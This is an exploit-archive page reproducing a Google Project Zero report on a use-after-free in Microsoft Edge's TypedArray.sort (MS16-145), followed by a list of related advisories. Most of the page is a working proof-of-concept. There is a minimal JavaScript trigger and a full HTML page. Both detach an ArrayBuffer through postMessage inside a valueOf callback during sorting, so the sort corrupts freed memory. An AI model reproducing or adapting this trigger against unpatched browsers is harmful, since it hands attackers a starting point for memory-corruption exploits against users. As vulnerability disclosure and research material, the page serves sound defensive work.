Lucene search
Google Security Research1337DAY-ID-27014HistoryFeb 14, 2017 - 12:00 a.m.
Microsoft Edge - TypedArray.sort Use-After-Free (MS16-145) Exploit
2017-02-1400:00:00
Google Security Research
0day.today
22
0.844 High
EPSS
Percentile
98.5%
Exploit for windows platform in category dos / poc
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=983
There is a use-after-free in TypedArray.sort. In TypedArrayCompareElementsHelper (https://chromium.googlesource.com/external/github.com/Microsoft/ChakraCore/+/TimeTravelDebugging/lib/Runtime/Library/TypedArray.cpp), the comparison function is called with the following code:
Var retVal = CALL_FUNCTION(compFn, CallInfo(CallFlags_Value, 3),
undefined,
JavascriptNumber::ToVarWithCheck((double)x, scriptContext),
JavascriptNumber::ToVarWithCheck((double)y, scriptContext));
Assert(TypedArrayBase::Is(contextArray[0]));
if (TypedArrayBase::IsDetachedTypedArray(contextArray[0]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_DetachedTypedArray, _u("[TypedArray].prototype.sort"));
}
if (TaggedInt::Is(retVal))
{
return TaggedInt::ToInt32(retVal);
}
if (JavascriptNumber::Is_NoTaggedIntCheck(retVal))
{
dblResult = JavascriptNumber::GetValue(retVal);
}
else
{
dblResult = JavascriptConversion::ToNumber_Full(retVal, scriptContext);
}
The TypeArray is checked to see if it has been detached, but then the return value from the function is converted to an integer, which can invoke valueOf. If this function detaches the TypedArray, one swap is perfomed on the buffer after it is freed.
A minimal PoC is as follows, and a full PoC is attached.
var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);
function v(){
postMessage("test", "http://127.0.0.1", [buf])
return 7;
}
function compareNumbers(a, b) {
return {valueOf : v};
}
numbers.sort(compareNumbers);
This PoC works on 64-bit systems only.
-->
<html>
<body>
<script>
var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);
var first = 0;
function v(){
alert("in v");
if( first == 0){
postMessage("test", "http://127.0.0.1", [buf])
first++;
}
return 7;
}
function compareNumbers(a, b) {
alert("in func");
return {valueOf : v};
}
try{
numbers.sort(compareNumbers);
}catch(e){
alert(e.message);
}
</script>
</body>
</html>
# 0day.today [2018-03-01] #Related
myhack58
myhack58
seebug
seebug
Microsoft Edge: Use-after-free in TypedArray.sortοΌCVE-2016-7288οΌ
2017-04-19 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2016-12-13 08:00:00
symantec
symantec
Microsoft Edge CVE-2016-7288 Remote Memory Corruption Vulnerability
2016-12-13 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Use After Free (MS16-145: CVE-2016-7288)
2016-12-13 00:00:00
prion
prion
Memory corruption
2016-12-20 06:59:00
Memory corruption
2016-12-20 06:59:00
Memory corruption
2016-12-20 06:59:00
cvelist
cvelist
cve
cve
nvd
nvd
openvas
openvas
Microsoft Edge Multiple Vulnerabilities (3204062)
2016-12-14 00:00:00
mskb
mskb
MS16-145: Cumulative security update for Microsoft Edge: December 13, 2016
2016-12-13 00:00:00
December 13, 2016 β KB3205383 (OS Build 10240.17202)
2016-12-13 08:00:00
December 13, 2016 β KB3205386 (OS Build 10586.713)
2016-12-13 08:00:00
nessus
nessus
MS16-145: Cumulative Security Update for Microsoft Edge (3204062)
2016-12-14 00:00:00
kaspersky
kaspersky
KLA10920 Multiple vulnerabilities in Microsoft Browser
2016-12-13 00:00:00